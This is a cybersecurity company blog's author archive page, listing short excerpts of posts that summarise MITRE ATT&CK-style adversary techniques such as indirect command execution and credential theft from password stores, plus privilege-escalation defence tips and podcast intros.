Indirect Command Execution Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking cmd. For example, Forfiles, the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a Command and Scripting Interpreter, Run window, or via ... Read More
About Katherine KostrevaThis author has not yet filled in any details.
So far Katherine Kostreva has created 37 blog entries.
Credentials from Password Stores Adversaries may search for common password storage locations to obtain user credentials. Passwords are stored in several places on a system, depending on the operating system or application holding the credentials. There are also specific applications that store passwords to make it easier for users manage and maintain. Once credentials are obtained, they can be used to perform lateral movement and access restricted information. Credentials from Password Stores: Credentials from Web ... Read More
Native API Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes. These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations. Functionality provided by native APIs are ... Read More
Command and Scripting Interpreter Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell. There are also cross-platform interpreters such ... Read More
Compromise Accounts: Adversaries may compromise accounts with services that can be used during targeting. For operations incorporating social engineering, the utilization of an online persona may be important. Rather than creating and cultivating accounts (i.e. Establish Accounts), adversaries may compromise existing accounts. Utilizing an existing persona may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. A variety of methods exist for compromising accounts, ... Read More
Hijack Execution Flow: Adversaries may execute their own malicious payloads by hijacking the way operating systems run programs. Hijacking execution flow can be for the purposes of persistence, since this hijacked execution may reoccur over time. Adversaries may also use these mechanisms to elevate privileges or evade defenses, such as application control or other restrictions on execution. There are many ways an adversary may hijack the flow of execution, including by manipulating how the operating ... Read More
Active Scanning: Adversaries may execute active reconnaissance scans to gather information that can be used during targeting. Active scans are those where the adversary probes victim infrastructure via network traffic, as opposed to other forms of reconnaissance that do not involve direct interaction. Active Scanning: Scanning IP Blocks Adversaries may scan victim IP blocks to gather information that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a ... Read More
How To Protect Against Privilege Escalation Attacks: Create strong passwords and change them regularly. This simple action can lower the risk of privilege escalation cyber attacks. If all administrator accounts have a strong password, hackers will struggle to take control of their accounts. You can also protect against privilege escalation cyberattacks by monitoring login requests. Hackers may gain access by performing a brute force attack. Watch login requests. This way, you can see which users are ... Read More
Hello! Welcome back to this next TomCast from GuardSight; we are a tactical cybersecurity-as-a-service organization dedicated to helping businesses protect their data, their assets, and their endpoints. Today’s discussion involves web browsing. Web browsing requires a web browser, which is defined by Oxford as “a computer program with a graphical user interface for displaying and navigating between web pages”. If you have ever heard the term “surfing the web” or navigating the web, ... Read More
Hello! Welcome back to this next TomCast from GuardSight; we are a tactical cybersecurity-as-a-service organization dedicated to helping businesses protect their data, their assets, and their endpoints. Today’s discussion involves soft skills. What are soft skills? Since I am a fan of looking up definitions from Oxford, we’ll remain consistent here. Soft skills are “personal attributes that enable someone to interact effectively and harmoniously with other people”. Why would anyone want to interact ... Read More